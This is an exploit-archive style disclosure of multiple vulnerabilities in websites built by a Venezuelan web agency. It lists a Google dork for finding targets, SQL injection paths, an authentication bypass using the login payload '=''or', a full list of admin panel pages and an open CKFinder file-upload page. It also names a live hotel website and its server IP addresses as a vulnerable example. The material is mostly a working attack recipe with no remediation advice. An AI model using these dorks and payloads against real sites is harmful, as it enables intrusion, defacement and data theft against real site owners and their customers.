facebook facebook twitter rss

Desarrollado por Díaz Creativos Venezuella Multiple Vulnerabilities

Author: KingSkrupellos , Published: 18-01-2019

# Exploit Title : Desarrollado por Díaz Creativos Venezuella Multiple Vulnerabilities
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 16/01/2019
# Vendor Homepage : diazcreativos.net - diazcreativos.net.ve
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Desarrollado por: Díaz Creativos'' site:ve
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
CWE-264 [ Permissions, Privileges, and Access Controls ]
CWE-592 [ Authentication Bypass Issues ]

####################################################################

# Vulnerabilities includes :
************************

1) SQL Injection Vulnerability

2) Authentication Bypass Vulnerability

3) Arbitrary File Upload Vulnerability

####################################################################

# Admin Panel Login Path :
*************************

/admin/

# SQL Injection Exploit :
***********************

/contenido.php?id=[SQL Injection]

/THIS-PATH-CHANGES/contenido.php?id=[SQL Injection]

/margarita/contenido.php?id=[SQL Injection]

/merida/contenido.php?id=[SQL Injection]

# Authentication Bypass Exploit :
*****************************

Admin username : '=''or'

Admin password : '=''or'

/admin/panel_central.php

/admin/link/

/admin/link/insertar.php

/admin/link/editar.php?id=[ID-NUMBER]

/admin/contenido/

/admin/contenido/insertar.php

/admin/contenido/editar.php?id=[ID-NUMBER]

/admin/banner/

/admin/banner/insertar.php

/admin/banner/editar.php?id=[ID-NUMBER]

/imagenes/banner/[RANDOM-NUMBERS.[jpg-gif-png]

/admin/publicidad/

/admin/publicidad/insertar.php

/admin/publicidad/editar.php?id=[ID-NUMBER]

/admin/hotel/

/admin/hotel/insertar.php

/admin/hotel/editar.php?id=[ID-NUMBER]

/admin/usuario/

/admin/usuario/insertar.php

/admin/usuario/editar.php?id=[ID-NUMBER]

/admin/galeria/

/admin/galeria/insertar.php

/admin/galeria/editar.php?id=[ID-NUMBER]

# Arbitrary File Upload Exploit :
****************************

/ckfinder/ckfinder.html

Directory Path :

/imagenes/galeria/files/.......

/imagenes/galeria/images/.....

####################################################################

# Example Vulnerable Site :
*************************

[+] tibisayhotelboutique.com/contenido.php?id=22%27 =>

[ Proof of Concept ] => archive.fo/ObbWA

Note : (160.153.33.195) => There are 103 domains hosted on this server.

Note : (173.247.251.224) => There are 24 domains hosted on this server.

####################################################################

# SQL Database Error :
**********************

You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the right syntax to use near ''61''
= id_con AND id_con = galeria_image' at line 1

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

####################################################################

Like us on Facebook :